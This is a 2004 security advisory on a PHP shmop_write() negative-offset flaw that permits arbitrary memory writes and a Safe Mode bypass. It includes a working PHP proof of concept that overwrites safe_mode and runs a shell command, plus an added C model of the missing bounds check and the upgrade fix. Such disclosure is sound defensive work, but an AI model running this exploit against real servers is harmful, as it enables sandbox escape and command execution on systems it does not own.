Vulnerability in Php shmop module: write of arbitrary memory - Safe Mode Bypass

Title:

PHP Safe_mode Bypass in shmop module

Author:

Stefano Di Paola

Vulnerable:

PHP <= 5.0.2 and <= 4.3.9, when the shmop module is loaded.

Type of Vulnerability:

Input Validation - write of arbitrary memory

Resources:

Published on Bugtraq and VulnWatch

Summary

The PHP shared memory (shmop) module does not correctly bound-check the offset in shmop_write(), so a write can land outside the segment.
This flaw can be used to bypass Safe Mode, among other bad things.

Description

In shmop.c, PHP_FUNCTION(shmop_write) does not check whether the 'offset' value is negative,
so arbitrary memory can be overwritten through:
 memcpy(shmop->addr + offset, data, writesize);
In particular, this can be used to set safe_mode to off.
A proof of concept for this vulnerability is attached.
It needs some gdb debugging, or printing the address of core_globals.safe_mode,
and some trial and error to get the right distance to set in '$offset'.

Of course, shmop.so needs to be loaded as a module or built into the PHP binary. :)
<?php
/*
   Php Safe_mode Bypass Proof of concept.

   Copyright 2004 Stefano Di Paola stefano.dipaola[at]wisec.it

   Disclaimer: The author is not responsible of any damage this script can cause
*/

// Create (or attach to) a 100-byte shared memory segment with key 0xff2.
$shm_id = shmop_open(0xff2, "c", 0644, 100);
if (!$shm_id) {
    echo "Couldn't create shared memory segment\n";
    die;
}

// $data = "\x01";
// the new value for safe_mode
$data = "\x00";

// this (-3842685) is my offset to reach core_globals.safe_mode
// taken with gdb. (0x40688d83)
$offset = -3842685;

// Lets write the new value at our offset.
// The vulnerable shmop_write() does not reject a negative offset,
// so the memcpy() lands outside the segment.
$shm_bytes_written = shmop_write($shm_id, $data, $offset);
if ($shm_bytes_written != strlen($data)) {
    echo "Couldn't write the entire length of data\n";
}

// Now lets delete the block and close the shared memory segment
if (!shmop_delete($shm_id)) {
    echo "Couldn't mark shared memory block for deletion.";
}
shmop_close($shm_id);

// Let's try if safe mode has been set to off
echo passthru("id");
dl("shmop.so");
?>
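To show the flaw from the fixing side, here is an added example (not code from this advisory, from PHP's shmop.c, or from the 5.0.3/4.3.10 patch): a small C model of the bounds check shmop_write() must apply before its memcpy(), run over a 100-byte segment like the PoC's with the PoC's offset and a few boundary values. The struct shmop_sim, the functions shmop_write_in_bounds() and shmop_sim_write(), and the test inputs are assumptions for illustration; the real module's data structure is not reproduced here.

```c
#include <stdio.h>
#include <string.h>

/* Minimal stand-in for the module's segment descriptor (an assumption:
 * only the two fields the bounds check needs are modelled). */
struct shmop_sim {
    char *addr;   /* start of the mapped segment */
    long  size;   /* segment length in bytes */
};

/* Bounds check for writing `writesize` bytes at `offset` inside a segment
 * of `size` bytes.  Returns 0 if the write stays inside the segment and -1
 * otherwise.  The advisory's flaw is that a negative offset was never
 * rejected, so memcpy(shmop->addr + offset, ...) could land far below the
 * segment; the `offset < 0` test is exactly that missing check. */
int shmop_write_in_bounds(long size, long offset, long writesize)
{
    if (size < 0 || writesize < 0)
        return -1;                    /* nonsensical lengths */
    if (offset < 0)
        return -1;                    /* the check the advisory says was missing */
    if (offset > size)
        return -1;                    /* start lies past the end of the segment */
    if (writesize > size - offset)
        return -1;                    /* overflow-safe form of offset + writesize > size */
    return 0;
}

/* Write helper that touches memory only after the check passes.
 * Returns the number of bytes written, or -1 if the write was rejected. */
long shmop_sim_write(struct shmop_sim *shm, const char *data, long writesize, long offset)
{
    if (shmop_write_in_bounds(shm->size, offset, writesize) != 0)
        return -1;
    memcpy(shm->addr + offset, data, (size_t)writesize);
    return writesize;
}

int main(void)
{
    /* Constructed segment and inputs: a 100-byte segment like the PoC's,
     * the PoC's offset, and a few boundary cases. */
    char backing[100];
    memset(backing, 0, sizeof backing);
    struct shmop_sim shm = { backing, (long)sizeof backing };
    long offsets[] = { 0, 99, 100, -1, -3842685 };
    const char byte = 0x00;

    for (size_t i = 0; i < sizeof offsets / sizeof offsets[0]; i++) {
        long n = shmop_sim_write(&shm, &byte, 1, offsets[i]);
        printf("offset %ld: %s\n", offsets[i], n < 0 ? "rejected" : "written");
    }
    return 0;
}
```

Run as-is, the loop accepts offsets 0 and 99, rejects 100 (a one-byte write there would end past the segment), and rejects both negative offsets, including the PoC's -3842685. The lower-bound check is the one that matters for this advisory; the `size - offset` form of the upper-bound check is there so a large writesize cannot wrap the addition.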

Solution:

Update php to 5.0.3 or 4.3.10

Florence, 19 December 2004
